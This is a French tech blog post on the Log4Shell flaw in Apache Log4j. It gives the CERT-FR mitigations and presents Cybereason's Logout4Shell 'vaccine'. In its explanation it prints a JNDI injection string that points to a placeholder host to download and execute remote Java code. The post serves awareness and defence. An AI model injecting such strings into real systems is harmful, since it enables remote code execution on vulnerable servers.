Un vaccin pour la faille Log4Shell

@Korben — 12 décembre 2021

Si vous vous intéressez un peu à la sécurité informatique, il ne vous aura pas échappé que le 9 décembre dernier, une faille 0day touchant Apache Log4j avait été divulguée. Baptisée Log4Shell, cette faille qui touche log4j de la version 2.0 à 2.14.1 a obtenu un score CVSS de 10/10 en matière de gravité.

Woohoo.

Ça transpire fort un peu partout surtout que la faille est actuellement utilisée. Pour vous la faire courte, il suffit de réussir à faire passer dans les logs analysés par log4j les caractères suivants.

${jndi:ldap://URL.com/FICHIER_JAVA}

et cela aura pour effet de télécharger et exécuter le fichier java qui est au bout de l’url « URL.com/FICHIER_JAVA ». C’est aussi simple que dramatique.

Schéma montrant comment la faille Log4j permet aux pirates de prendre le contrôle d'un système

Il y a beaucoup de littérature là-dessus notamment du côté du CERT-FR donc je ne vais pas m’étaler sur le sujet, mais un projet Github intéressant et amusant est né de tout ce bordel.

Vous le savez, pour patcher cette vulnérabilité Log4Shell (CVE-2021-44228), il faut de toute urgence mettre à jour log4j vers une version >= 2.15.0.

Et si ce n’est pas possible :

Pour les applications utilisant les versions 2.10.0 et ultérieures de la bibliothèque log4j, il est également possible de se prémunir contre toute attaque en modifiant le paramètre de configuration log4j2.formatMsgNoLookups à la valeur true, par exemple lors du lancement de la machine virtuelle Java avec l’option -Dlog4j2.formatMsgNoLookups=true. Une autre alternative consiste à supprimer la classe JndiLookup dans le paramètre classpath pour éliminer le vecteur principal d’attaque (les chercheurs n’excluent pas l’existence d’un autre vecteur d’attaque).
Cert FR

Mais une autre possibilité consiste à laisser faire la nature et c’est ce que propose Cybereason avec ce code baptisé Logout4Shell qui exploite la vulnérabilité Log4Shell pour… la patcher tout simplement.

Photo de scientifiques travaillant sur le vaccin contre la faille Log4Shell

Le payload qui est chargé via la faille va forcer l’enregistreur Log4j à se reconfigurer pour basculer le paramètre qui va bien sur True et empêchera ainsi toute exploitation ultérieure via cette attaque.

C’est un genre de cyber vaccin en attendant une vraie mise à jour de Log4j.

Si cela vous intéresse, le code est dispo sur Github.

Bon courage à ceux qui sont impactés.

Illustration d'une seringue injectant le vaccin contre la faille Log4Shell

A lire également :

Que faire après le bac quand on est passionné de cybersécurité ?

Entièrement dédiée à la cybersécurité, l’école Guardia est accessible soit directement après le bac (post-bac), soit après un bac+2 ou bac+3. En rejoignant l’école Guardia, vous deviendrez développeur informatique option cybersécurité (Bac+3) ou expert en cybersécurité (Bac+5).

Cliquez ici pour en savoir plus

Lien sponsorisé

Sécurité

Des idées pour vos menus (+ 10 € de réduction sur vos prochaines courses)

Jow est une application iOS et Android ainsi qu’un site web, qui propose des menus délicieux et rapide à réaliser. L’application se connecte à votre magasin préféré (Carrefour, Auchan, E. Leclerc…etc.) et génère la liste de vos courses tout en vous proposant des réductions.

Jow c’est top si :

Vous cherchez sans cesse des idées de menu
Vous voulez gagner du temps avec vos courses
Vous souhaitez manger plus équilibré
Vous voulez éviter le gâchis alimentaire
Vous aimez vous partager des photos de vos créations culinaires sur les réseaux

10 € de réduction sur vos prochaines courses

Et comme une bonne nouvelle n’arrive jamais seule, si vous créez votre compte sur Jow en passant par ce lien, vous profiterez de 10 € de réduction sur vos courses avec ce code promo :